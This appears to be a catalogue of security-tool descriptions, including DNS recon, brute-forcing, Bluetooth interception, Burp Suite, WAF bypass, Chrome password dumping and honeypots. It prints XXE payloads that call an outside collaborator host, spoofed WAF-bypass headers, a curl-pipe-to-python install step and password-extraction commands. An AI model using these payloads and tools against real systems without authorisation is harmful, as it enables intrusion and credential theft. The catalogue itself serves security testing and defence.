BlueScreenView.exe /shtml "f:\temp\crashes.html" /sort 2 /sort ~1
BlueScreenView.exe /shtml "f:\temp\crashes.html" /sort "Bug Check String" /sort "~Crash Time"
/nosort When you specify this command-line option, the list will be saved without any sorting.


Download BlueScreenView

Bluto - DNS Recon, DNS Zone Transfer, and Email Enumeration

BLUTO DNS recon | Brute forcer | DNS Zone Transfer | Email Enumeration

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the 'The Alexa Top 1 Million subdomains'. NetCraft results are presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.

Bluto now does email address enumeration based on the target domain, currently using Bing and Google search engines. It is configured in such a way to use a random User Agent: on each request and does a country look up to select the fastest Google server in relation to your egress address. Each request closes the connection in an attempt to further avoid captchas, however exsesive lookups will result in captchas (Bluto will warn you if any are identified).

Bluto requires various other dependencies. So to make things as easy as possible, pip is used for the installation. This does mean you will need to have pip installed prior to attempting the Bluto install.

Pip Install Instructions
Note: To test if pip is already installed execute.
  pip -V

(1) Mac and Kali users can simply use the following command to download and install pip.
  curl https://bootstrap.pypa.io/get-pip.py -o - | python

Bluto Install Instructions
(1) Once pip has successfully downloaded and installed, we can install Bluto:
  sudo pip install git+git://github.com/RandomStorm/Bluto

(2) You should now be able to execute 'bluto' from any working directory in any terminal.
  bluto

Upgrade Instructions
(1) The upgrade process is as simple as;
  sudo pip install git+git://github.com/RandomStorm/Bluto --upgrade


Download Bluto

Bohatei - Flexible and Elastic DDoS Defense


Bohatei is a first of its kind platform that enables flexible and elastic DDoS defense using SDN and NFV.

The repository contains a first version of the components described in the Bohatei paper, as well as a web-based User Interface. The backend folder consists of :
  • an implementation of the FlowTags framework for the OpenDaylight controller
  • an implementation of the resource management algorithms
  • a topology file that was used to simulate an ISP topology
  • scripts that facilitate functions such as spawning, tearing down and retrieving the topology.
  • scripts that automate and coordinate the components required for the usecases examined.
The frontend folder contains the required files for the web interface.
For the experiments performed, we used a set of VM images that contain implementations of the strategy graphs for each type of attack (SYN Flood, UDP Flood, DNS Amplification and Elephant Flow). Those images will become available at a later stage. The tools that were used for those strategy graphs are the following:

Bohatei Paper
Bohatei Slides
Video

Download Bohatei

BruteX - Automatically Brute Force all Services Running on a Target


Automatically brute force all services running on a target including:
  • Open ports
  • DNS domains
  • Web files
  • Web directories
  • Usernames
  • Passwords

USAGE
./brutex target

DEPENDENCIES
  • NMap
  • Hydra
  • Wfuzz
  • SNMPWalk
  • DNSDict

To brute force multiple hosts, use brutex-massscan and include the IP's/hostnames to scan in the targets.txt file.


Download BruteX

Btproxy - Man In The Middle Analysis Tool For Bluetooth


Tested Devices
  • Pebble Steel smart watch
  • Moto 360 smart watch
  • OBDLink OBD-II Bluetooth Dongle
  • Withings Smart Baby Monitor
If you have tried anything else, please let me know at conorpp (at) vt (dot) edu.

Dependencies
  • Need at least 1 Bluetooth card (either USB or internal).
  • Need to be running Linux, another *nix, or OS X.
  • BlueZ 4
For a debian system, run
sudo apt-get install bluez bluez-utils bluez-tools libbluetooth-dev python-dev

Installation
sudo python setup.py install

Running
To run a simple MiTM or proxy on two devices, run
btproxy <master-bt-mac-address> <slave-bt-mac-address>
Run btproxy to get a list of command arguments.

Example
# This will connect to the slave 40:14:33:66:CC:FF device and 
# wait for a connection from the master F1:64:F3:31:67:88 device
btproxy F1:64:F3:31:67:88 40:14:33:66:CC:FF
Where the master is typically the phone and the slave mac address is typically the other peripherial device (smart watch, headphones, keyboard, obd2 dongle, etc).
The master is the device the sends the connection request and the slave is the device listening for something to connect to it.
After the proxy connects to the slave device and the master connects to the proxy device, you will be able to see traffic and modify it.

How to find the BT MAC Address?
Well, you can look it up in the settings usually for a phone. The most robost way is to put the device in advertising mode and scan for it.
There are two ways to scan for devices: scanning and inquiring. hcitool can be used to do this:
hcitool scan
hcitool inq
To get a list of services on a device:
sdptool records <bt-address>

Usage
Some devices may restrict connecting based on the name, class, or address of another bluetooth device.
So the program will lookup those three properties of the target devices to be proxied, and then clone them onto the proxying adapter(s).
Then it will first try connecting to the slave device from the cloned master adaptor. It will make a socket for each service hosted by the slave and relay traffic for each one independently.
After the slave is connected, the cloned slave adaptor will be set to be listening for a connection from the master. At this point, the real master device should connect to the adaptor. After the master connects, the proxied connection is complete.

Using only one adapter
This program uses either 1 or 2 Bluetooth adapters. If you use one adapter, then only the slave device will be cloned. Both devices will be cloned if 2 adapters are used; this might be necessary for more restrictive Bluetooth devices.

Advanced Usage
Manipulation of the traffic can be handled via python by passing an inline script. Just implement the master_cb and slave_cb callback functions. This are called upon receiving data and the returned data is sent back out to the corresponding device.
# replace.py
def master_cb(req):
    """
        Received something from master, about to be sent to slave.
    """
    print '<< ', repr(req)
    open('mastermessages.log', 'a+b').write(req)
    return req

def slave_cb(res):
    """
        Same as above but it's from slave about to be sent to master
    """
    print '>> ', repr(res)
    open('slavemessages.log', 'a+b').write(res)
    return res
Also see the example functions for manipulating Pebble watch traffic in replace.py
This code can be edited and reloaded during runtime by entering 'r' into the program console. This avoids the pains of reconnecting. Any errors will be caught and regular transmission will continue.

TODO
  • BLE
  • Improve the file logging of the traffic and make it more interactive for
  • replays/manipulation.
  • Indicate which service is which in the output.
  • Provide control for disconnecting/connecting services.
  • PCAP file support
  • ncurses?

How it works
This program starts by killing the bluetoothd process, running it again with a LD_PRELOAD pointed to a wrapper for the bind system call to block bluetoothd from binding to L2CAP port 1 (SDP). All SDP traffic goes over L2CAP port 1 so this makes it easy to MiTM/forward between the two devices and we don't have to worry about mimicking the advertising.
The program first scans each device for their name and device class to make accurate clones. It will append the string '_btproxy' to each name to make them distinguishable from a user perspective. Alternatively, you can specify the names to use at the command line.
The program then scans the services of the slave device. It makes a socket connection to each service and open a listening port for the master device to connect to. Once the master connects, the Proxy/MiTM is complete and output will be sent to STDOUT.

Notes
Some bluetooth devices have different methods of pairing which makes this process more complicated. Right now it supports SPP and legacy pin pairing.
This program doesn't yet have support for Bluetooth Low Energy. A similiar approach to BLE can be taken.

Errors

btproxy or bluetoothd hangs
If you are using bluez 5, you should try uninstalling and installing bluez 4 . I've had problems with bluez 5 hanging.

error accessing bluetooth device
Make sure the bluetooth adaptors are plugged in and enabled.
Run
    # See the list of all adaptors
    hciconfig -a

    # Enable
    sudo hciconfig hciX up

    # if you get this message
    Can't init device hci0: Operation not possible due to RF-kill (132)

    # Then try unblocking it with the rfkill command
    sudo rfkill unblock all

UserWarning: <path>/.python-eggs is writable by group/others
Fix
chmod g-rw,o-x <path>/.python-eggs


Download Btproxy

Burp Suite Professional 1.6.26 - The Leading Toolkit for Web Application Security Testing


Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

 Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:
  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

Release Notes v1.6.26

This release adds the ability to detect blind server-side XML/SOAP injection by triggering interactions with Burp Collaborator.

Previously, Burp Scanner has detected XML/SOAP injection by submitting some XML-breaking syntax like:
]]>>

and analyzing responses for any resulting error messages.

Burp now sends payloads like:
<nzf xmlns="http://a.b/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://kuiqswhjt3era6olyl63pyd.burpcollaborator.net/nzf.xsd">
nzf</nzf>
and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.

Note that this type of technique is effective even when the original parameter value does not contain XML, and there is no indication within the request or response that XML/SOAP is being used on the server side.

The new scan check uses both schema location and XInclude to cause the server-side XML parser to interact with the Collaborator server.

In addition, when the original parameter value does contain XML being submitted by the client, Burp now also uses the schema location and XInclude techniques to try to induce external service interactions. (We believe that Burp is now aware of all available tricks for inducing a server-side XML parser to interact with an external network service. But we would be very happy to hear of any others that people know about.)


Download Burp Suite Professional 1.6.26

Burp Suite Professional v1.6.16 - The Leading Toolkit for Web Application Security Testing


Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:
  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

Release Notes

v1.6.15

This release introduces a brand new feature: Burp Collaborator.

Burp Collaborator is an external service that Burp can use to help discover many kinds of vulnerabilities, and has the potential to revolutionize web security testing. In the coming months, we will be adding many exciting new capabilities to Burp, based on the Collaborator technology.
This release is officially beta due to the introduction of some new types of Scanner checks, and the reliance on a new service infrastructure. However, we have tested the new capabilities thoroughly and are not aware of any stability issues.

v1.6.16

This release fixes some issues with yesterday's beta release of the new Burp Collaborator feature, including a bug that may cause Burp to sometimes send some Collaborator-related test payloads even if the user has disabled use of the Collaborator feature.

This release is still officially beta while we monitor the Burp Collaborator capabilities for any further issues.


Burp Suite Professional v1.6.23 - The Leading Toolkit for Web Application Security Testing


Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:
  • An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
  • An application-aware Spider, for crawling content and functionality.
  • An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
  • An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
  • A Repeater tool, for manipulating and resending individual requests.
  • A Sequencer tool, for testing the randomness of session tokens.
  • The ability to save your work and resume working later.
  • Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

Release Notes

v1.6.23

This release adds a new scan check for external service interaction and out-of-band resource load via injected XML doctype tags containing entity parameters. Burp now sends payloads like:

<?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "http://u1w9aaozql7z31394loost.burpcollaborator.net">%f5a30; ]>

and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.

The release also fixes some issues:

  • Some bugs affecting the saving and restoring of Burp state files.
  • A bug in the Collaborator server where the auto-generated self-signed certificate does not use a wildcard prefix in the CN. This issue only affects private Collaborator server deployments where a custom SSL certificate has not been configured.

Download Burp Suite Professional v1.6.23

Burpkit - Next-Gen Burpsuite Penetration Testing Tool


Welcome to the next generation of web application penetration testing - using WebKit to own the web. BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional JavaScript bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.

System Requirements
BurpKit has the following system requirements:
  • Oracle JDK >=8u50 and <9 ( Download )
  • At least 4GB of RAM

Installation
Installing BurpKit is simple:
  1. Download the latest prebuilt release from the GitHub releases page .
  2. Open BurpSuite and navigate to the Extender tab.
  3. Under Burp Extensions click the Add button.
  4. In the Load Burp Extension dialog, make sure that Extension Type is set to Java and click the Select file ... button under Extension Details .
  5. Select the BurpKit-<version>.jar file and click Next when done.
If all goes well, you will see three additional top-level tabs appear in BurpSuite:
  1. BurpKitty : a courtesy browser for navigating the web within BurpSuite.
  2. BurpScript IDE : a lightweight integrated development environment for writing JavaScript-based BurpSuite plugins and other things.
  3. Jython : an integrated python interpreter console and lightweight script text editor.

BurpScript
BurpScript enables users to write desktop-based JavaScript applications as well as BurpSuite extensions using the JavaScript scripting language. This is achieved by injecting two new objects by default into the DOM on page load:
  1. burpKit : provides numerous features including file system I/O support and easy JS library injection.
  2. burpCallbacks : the JavaScript equivalent of the IBurpExtenderCallbacks interface in Java with a few slight modifications.
Take a look at the examples folder for more information.

More Information?
A readable version of the docs can be found at here


Download Burpkit

BWA - OWASP Broken Web Applications Project


A collection of vulnerable web applications that is distributed on a Virtual Machine.

Description

The Broken Web Applications (BWA) Project produces a Virtual Machine running a variety of applications with known vulnerabilities for those interested in:
  • learning about web application security
  • testing manual assessment techniques
  • testing automated tools
  • testing source code analysis tools
  • observing web attacks
  • testing WAFs and similar code technologies

All the while saving people interested in doing either learning or testing the pain of having to compile, configure, and catalog all of the things normally involved in doing this process from scratch.


Download OWASP Broken Web Applications Project

BypassWAF - Burp Plugin to Bypass Some WAF Devices


Add headers to all Burp requests to bypass some WAF products. This extension will automatically add the following headers to all requests.
  X-Originating-IP: 127.0.0.1
  X-Forwarded-For: 127.0.0.1
  X-Remote-IP: 127.0.0.1
  X-Remote-Addr: 127.0.0.1

Usage

Steps include:
  1. Add extension to burp
  2. Create a session handling rule in Burp that invokes this extension
  3. Modify the scope to include applicable tools and URLs
  4. Configure the bypass options on the "Bypass WAF" tab
  5. Test away
Read more here.

Features

All of the features are based on Jason Haddix's work found here, and Ivan Ristic's WAF bypass work found here and here.

Bypass WAF contains the following features:

A description of each feature follows:
  1. Users can modify the X-Originating-IP, X-Forwarded-For, X-Remote-IP, X-Remote-Addr headers sent in each request. This is probably the top bypass technique i the tool. It isn't unusual for a WAF to be configured to trust itself (127.0.0.1) or an upstream proxy device, which is what this bypass targets.
  2. The "Content-Type" header can remain unchanged in each request, removed from all requests, or by modified to one of the many other options for each request. Some WAFs will only decode/evaluate requests based on known content types, this feature targets that weakness.
  3. The "Host" header can also be modified. Poorly configured WAFs might be configured to only evaluate requests based on the correct FQDN of the host found in this header, which is what this bypass targets.
  4. The request type option allows the Burp user to only use the remaining bypass techniques on the given request method of "GET" or "POST", or to apply them on all requests.
  5. The path injection feature can leave a request unmodified, inject random path info information (/path/to/example.php/randomvalue?restofquery), or inject a random path parameter (/path/to/example.php;randomparam=randomvalue?resetofquery). This can be used to bypass poorly written rules that rely on path information.
  6. The path obfuscation feature modifies the last forward slash in the path to a random value, or by default does nothing. The last slash can be modified to one of many values that in many cases results in a still valid request but can bypass poorly written WAF rules that rely on path information.
  7. The parameter obfuscation feature is language specific. PHP will discard a + at the beginning of each parameter, but a poorly written WAF rule might be written for specific parameter names, thus ignoring parameters with a + at the beginning. Similarly, ASP discards a % at the beginning of each parameter.
  8. The "Set Configuration" button activates all the settings that you have chosen.
All of these features can be combined to provide multiple bypass options.


Download BypassWAF

CapTipper - Malicious HTTP traffic explorer tool


CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic.

CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.

The tool provides the security researcher with easy access to the files and the understanding of the network flow,and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes.
Feeding CapTipper with a drive-by traffic capture (e.g of an exploit kit) displays the user with the requests URI's that were sent and responses meta-data.

The user can at this point browse to http://127.0.0.1/[URI] and receive the response back to the browser.

In addition, an interactive shell is launched for deeper investigation using various commands such as: hosts, hexdump, info, ungzip, body, client, dump and more...


Download CapTipper

CenoCipher - Easy-To-Use, End-To-End Encrypted Communications Tool


CenoCipher is a free, open-source, easy-to-use tool for exchanging secure encrypted communications over the internet. It uses strong cryptography to convert messages and files into encrypted cipher-data, which can then be sent to the recipient via regular email or any other channel available, such as instant messaging or shared cloud storage.

Features at a glance

  • Simple for anyone to use. Just type a message, click Encrypt, and go
  • Handles messages and file attachments together easily
  • End-to-end encryption, performed entirely on the user's machine
  • No dependence on any specific intermediary channel. Works with any communication method available
  • Uses three strong cryptographic algorithms in combination to triple-protect data
  • Optional steganography feature for embedding encrypted data within a Jpeg image
  • No installation needed - fully portable application can be run from anywhere
  • Unencrypted data is never written to disk - unless requested by the user
  • Multiple input/output modes for convenient operation

Technical details

  • Open source, written in C++
  • AES/Rijndael, Twofish and Serpent ciphers (256-bit keysize variants), cascaded together in CTR mode for triple-encryption of messages and files
  • HMAC-SHA-256 for construction of message authentication code
  • PBKDF2-HMAC-SHA256 for derivation of separate AES, Twofish and Serpent keys from user-chosen passphrase
  • Cryptographically safe pseudo-random number generator ISAAC for production of Initialization Vectors (AES/Twofish/Serpent) and Salts (PBKDF2)

Version History (Change Log)

Version 4.0 (December 05, 2015)

  • Drastically overhauled and streamlined interface
  • Added multiple input/output modes for cipher-data
  • Added user control over unencrypted disk writes
  • Added auto-decrypt and open-with support
  • Added more entropy to Salt/IV generation

Version 3.0 (June 29, 2015)

  • Added Serpent algorithm for cascaded triple-encryption
  • Added steganography option for concealing data within Jpeg
  • Added conversation mode for convenience
  • Improved header obfuscation for higher security
  • Increased entropy in generation of separate salt/IVs used by ciphers
  • Many other enhancements under the hood

Version 2.1 (December 6, 2014)

  • Change cascaded encryption cipher modes from CBC to CTR for extra security
  • Improve PBKDF2 rounds determination and conveyance format
  • Fix minor bug related to Windows DPI font scaling
  • Fix minor bug affecting received filenames when saved by user

Version 2.0 (November 26, 2014)

  • Initial open-source release
  • Many enhancements to encryption algorithms and hash functions

Version 1.0 (June 10, 2014)

  • Original program release (closed source / beta)

Download CenoCipher

Cheat - Create and view interactive cheatsheets on the command-line


cheat allows you to create and view interactive cheatsheets on the command-line. It was designed to help remind *nix system administrators of options for commands that they use frequently, but not frequently enough to remember.

cheat depends only on python and pip.

Example

The next time you're forced to disarm a nuclear weapon without consulting Google, you may run:
cheat tar
You will be presented with a cheatsheet resembling:
# To extract an uncompressed archive: 
tar -xvf /path/to/foo.tar

# To extract a .gz archive:
tar -xzvf /path/to/foo.tgz

# To create a .gz archive:
tar -czvf /path/to/foo.tgz /path/to/foo/

# To extract a .bz2 archive:
tar -xjvf /path/to/foo.tgz

# To create a .bz2 archive:
tar -cjvf /path/to/foo.tgz /path/to/foo/
To see what cheatsheets are availble, run cheat -l.
Note that, while cheat was designed primarily for *nix system administrators, it is agnostic as to what content it stores. If you would like to use cheat to store notes on your favorite cookie recipes, feel free.

Installing

Using pip
sudo pip install cheat

Using homebrew
brew install cheat

Manually
First install the required python dependencies with:
sudo pip install docopt pygments
Then, clone this repository, cd into it, and run:
sudo python setup.py install

Modifying Cheatsheets

The value of cheat is that it allows you to create your own cheatsheets - the defaults are meant to serve only as a starting point, and can and should be modified.

Cheatsheets are stored in the ~/.cheat/ directory, and are named on a per-keyphrase basis. In other words, the content for the tar cheatsheet lives in the ~/.cheat/tar file.

Provided that you have an EDITOR environment variable set, you may edit cheatsheets with:
cheat -e foo

If the 'foo' cheatsheet already exists, it will be opened for editing. Otherwise, it will be created automatically.

After you've customized your cheatsheets, I urge you to track ~/.cheat/ along with your dotfiles.


Download Cheat

Chrome Autofill Viewer - Tool to View or Delete Autocomplete data from Google Chrome browser


Chrome Autofill Viewer is the free tool to easily see and delete all your autocomplete data from Google Chrome browser.

Chrome stores Autofill entries (typically form fields) such as login name, pin, passwords, email, address, phone, credit/debit card number, search history etc in an internal database file.

'Chrome Autofill Viewer' helps you to automatically find and view all the Autofill history data from Chrome browser. For each of the entry, it display following details,
  • Field Name
  • Value
  • Total Used Count
  • First Used Date
  • Last Used Date
You can also use it to view from history file belonging to another user on same or remote system. It also provides one click solution to delete all the displayed Autofill data from the history file.

It is very simple to use for everyone, especially makes it handy tool for Forensic investigators.

Chrome Autofill Viewer is fully portable and works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Features
  • Instantly view all the Autofill list from Chrome browser
  • On startup, it auto detects Autofill file from Chrome's default profile location
  • Sort feature to arrange the data in various order to make it easier to search through 100's of entries.
  • Delete all the Autofill data with just a click of button
  • Save the displayed Autofill list to HTML/XML/TEXT/CSV file
  • Easier and faster to use with its enhanced user friendly GUI interface
  • Fully Portable, does not require any third party components like JAVA, .NET etc
  • Support for local Installation and uninstallation of the software

How to Use?

Chrome Autofill Viewer is easy to use with its simple GUI interface.

Here are the brief usage details
  • Launch ChromeAutofillViewer on your system
  • By default it will automatically find and display the autofill file from default profile location of Chrome. You can also select the desired file manually.
  • Next click on 'Show All' button and all stored Autofill data will be displayed in the list as shown in screenshot 1 below.
  • If you want to remove all the entries, click on 'Delete All' button below.
  • Finally you can save all displayed entries to HTML/XML/TEXT/CSV file by clicking on 'Export' button and then select the type of file from the drop down box of 'Save File Dialog'.

ChromePass - Chrome Browser Password Recovery Tool


ChromePass is a small password recovery tool that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry, the following information is displayed: Origin URL, Action URL, User Name Field, Password Field, User Name, Password, and Created Time.

You can select one or more items and then save them into text/html/xml file or copy them to the clipboard.

Using ChromePass

ChromePass doesn't require any installation process or additional DLL files. In order to start using ChromePass, simply run the executable file - ChromePass.exe After running it, the main window will display all passwords that are currently stored in your Google Chrome browser.

Reading ChromePass passwords from external drive

Starting from version 1.05, you can also read the passwords stored by Chrome Web browser from an external profile in your current operating system or from another external drive (For example: from a dead system that cannot boot anymore). In order to use this feature, you must know the last logged-on password used for this profile, because the passwords are encrypted with the SHA hash of the log-on password, and without that hash, the passwords cannot be decrypted.

You can use this feature from the UI, by selecting the 'Advanced Options' in the File menu, or from command-line, by using /external parameter. The user profile path should be something like "C:\Documents and Settings\admin" in Windows XP/2003 or "C:\users\myuser" in Windows Vista/2008.

Command-Line Options
/stext <Filename> Save the list of passwords into a regular text file.
/stab <Filename> Save the list of passwords into a tab-delimited text file.
/scomma <Filename> Save the list of passwords into a comma-delimited text file.
/stabular <Filename> Save the list of passwords into a tabular text file.
/shtml <Filename> Save the list of passwords into HTML file (Horizontal).
/sverhtml <Filename> Save the list of passwords into HTML file (Vertical).
/sxml <Filename> Save the list of passwords to XML file.
/skeepass <Filename> Save the list of passwords to KeePass csv file.
/external <User Profile Path> <Last Log-On Password> Load the Chrome passwords from external drive/profile. For example:
chromepass.exe /external "C:\Documents and Settings\admin" "MyPassword"


Download ChromePass

CMSmap - Scanner to detect security flaws of the most popular CMSs (WordPress, Joomla and Drupal)



CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

At the moment, CMSs supported by CMSmap are WordPress, Joomla and Drupal.

Please note that this project is an early state. As such, you might find bugs, flaws or mulfunctions. Use it at your own risk!

Installation
You can download the latest version of CMSmap by cloning the GitHub repository:
git clone https://github.com/Dionach/CMSmap.git

Usage
CMSmap tool v0.3 - Simple CMS Scanner
Author: Mike Manzotti mike.manzotti@dionach.com
Usage: cmsmap.py -t <URL>
          -t, --target    target URL (e.g. 'https://abc.test.com:8080/')
          -v, --verbose   verbose mode (Default: false)
          -T, --threads   number of threads (Default: 5)
          -u, --usr       username or file 
          -p, --psw       password or file
          -i, --input     scan multiple targets listed in a given text file
          -o, --output    save output in a file
          -k, --crack     password hashes file
          -w, --wordlist  wordlist file (Default: rockyou.txt - WordPress only)       
          -a, --agent     set custom user-agent  
          -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules
          -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
          -F, --fullscan  full scan using large plugin lists. Slow! (Default: false)
          -h, --help      show this help   

Example: cmsmap.py -t https://example.com
         cmsmap.py -t https://example.com -f W -F
         cmsmap.py -t https://example.com -i targets.txt -o output.txt
         cmsmap.py -t https://example.com -u admin -p passwords.txt
         cmsmap.py -k hashes.txt


Download CMSmap

Codetainer - A Docker Container In Your Browser


codetainer allows you to create code 'sandboxes' you can embed in your web applications (think of it like an OSS clone of codepicnic.com ).

Codetainer runs as a webservice and provides APIs to create, view, and attach to the sandbox along with a nifty HTML terminal you can interact with the sandbox in realtime. It uses Docker and its introspection APIs to provide the majority of this functionality.

Codetainer is written in Go. For more information, see the slides from a talk introduction .

Build & Installation

Requirements
  • Docker >=1.8 (required for file upload API)
  • Go >=1.4
  • godep

Building & Installing From Source
# set your $GOPATH
go get github.com/codetainerapp/codetainer  
# you may get errors about not compiling due to Asset missing, it's ok. bindata.go needs to be created
# by `go generate` first.
cd $GOPATH/src/github.com/codetainerapp/codetainer
# make install_deps  # if you need the dependencies like godep
make
This will create ./bin/codetainer.

Configuring Docker
You must configure Docker to listen on a TCP port.
DOCKER_OPTS="-H tcp://127.0.0.1:4500 -H unix:///var/run/docker.sock"

Configuring codetainer
See ~/.codetainer/config.toml. This file will get auto-generated the first time you run codetainer, please edit defaults as appropriate.
# Docker API server and port
DockerServer = "localhost"
DockerPort = 4500

# Enable TLS support (optional, if you access to Docker API over HTTPS)
# DockerServerUseHttps = true
# Certificate directory path (optional)
#   e.g. if you use Docker Machine: "~/.docker/machine/certs"
# DockerCertPath = "/path/to/certs"

# Database path (optional, default is ~/.codetainer/codetainer.db)
# DatabasePath = "/path/to/codetainer.db"

Running an example codetainer
$ sudo docker pull ubuntu:14.04
$ codetainer image register ubuntu:14.04
$ codetainer create ubuntu:14.04 my-codetainer-name
$ codetainer server  # to start the API server on port 3000

Embedding a codetainer in your web app
  1. Copy codetainer.js to your webapp.
  2. Include codetainer.js and jquery in your web page. Create a div to house the codetainer terminal iframe (it's #terminal in the example below).
    <!DOCTYPE html>
    <html>
    <head>
      <meta charset="UTF-8">
      <title>lsof tutorial</title>
      <link rel='stylesheet' href='/stylesheets/style.css' />
      <script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
      <script src="/javascripts/codetainer.js"></script>
      <script src="/javascripts/lsof.js"></script>
    </head>
    <body>
       <div id="terminal" data-container="YOUR CODETAINER ID HERE"> 
    </body>
    </html> 
  3. Run the javascript to load the codetainer iframe from the codetainer API server (supply data-container as the id of codetainer on the div, or supply codetainer in the constructor options).
 $('#terminal').codetainer({
     terminalOnly: false,                 // set to true to show only a terminal window 
     url: "http://127.0.0.1:3000",        // replace with codetainer server URL
     container: "YOUR CONTAINER ID HERE",
     width: "100%",
     height: "100%",
  });


Download Codetainer

Collection Of Awesome Honeypots


A curated list of awesome honeypots, tools, components and much more. The list is divided into categories such as web, services, and others, focusing on open source projects.

Honeypots

  • Database Honeypots
  • Web honeypots
  • Service Honeypots
    • Kippo - Medium interaction SSH honeypot
    • honeyntp - NTP logger/honeypot
    • honeypot-camera - observation camera honeypot
    • troje - a honeypot built around lxc containers. It will run each connection with the service within a seperate lxc container.
    • slipm-honeypot - A simple low-interaction port monitoring honeypot
    • HoneyPy - A low interaction honeypot
    • Ensnare - Easy to deploy Ruby honeypot
    • RDPy - A Microsoft Remote Desktop Protocol (RDP) honeypot in python
  • Anti-honeypot stuff
    • kippo_detect - This is not a honeypot, but it detects kippo. (This guy has lots of more interesting stuff)
  • ICS/SCADA honeypots
    • Conpot - ICS/SCADA honeypot
    • scada-honeynet - mimics many of the services from a popular PLC and better helps SCADA researchers understand potential risks of exposed control system devices
    • SCADA honeynet - Building Honeypots for Industrial Networks
  • Deployment
  • Data Analysis
    • Kippo-Graph - a full featured script to visualize statistics from a Kippo SSH honeypot
    • Kippo stats - Mojolicious app to display statistics for your kippo SSH honeypot
  • Other/random
    • NOVA uses honeypots as detectors, looks like a complete system.
    • Open Canary - A low interaction honeypot intended to be run on internal networks.
    • libemu - Shellcode emulation library, useful for shellcode detection.
  • Open Relay Spam Honeypot
  • Botnet C2 monitor
    • Hale - Botnet command & control monitor
  • IPv6 attack detection tool
    • ipv6-attack-detector - Google Summer of Code 2012 project, supported by The Honeynet Project organization
  • Research Paper
    • vEYE - behavioral footprinting for self-propagating worm detection and profiling
  • Honeynet statistics
    • HoneyStats - A statistical view of the recorded activity on a Honeynet
  • Dynamic code instrumentation toolkit
    • Frida - Inject JavaScript to explore native apps on Windows, Mac, Linux, iOS and Android
  • Front-end for dionaea
    • DionaeaFR - Front Web to Dionaea low-interaction honeypot
  • Tool to convert website to server honeypots
    • HIHAT - ransform arbitrary PHP applications into web-based high-interaction Honeypots
  • Malware collector
    • Kippo-Malware - Python script that will download all malicious files stored as URLs in a Kippo SSH honeypot database
  • Sebek in QEMU
    • Qebek - QEMU based Sebek. As Sebek, it is data capture tool for high interaction honeypot
  • Malware Simulator
    • imalse - Integrated MALware Simulator and Emulator
  • Distributed sensor deployment
    • Smarthoneypot - custom honeypot intelligence system that is simple to deploy and easy to manage
    • Modern Honey Network - Multi-snort and honeypot sensor management, uses a network of VMs, small footprint SNORT installations, stealthy dionaeas, and a centralized server for management
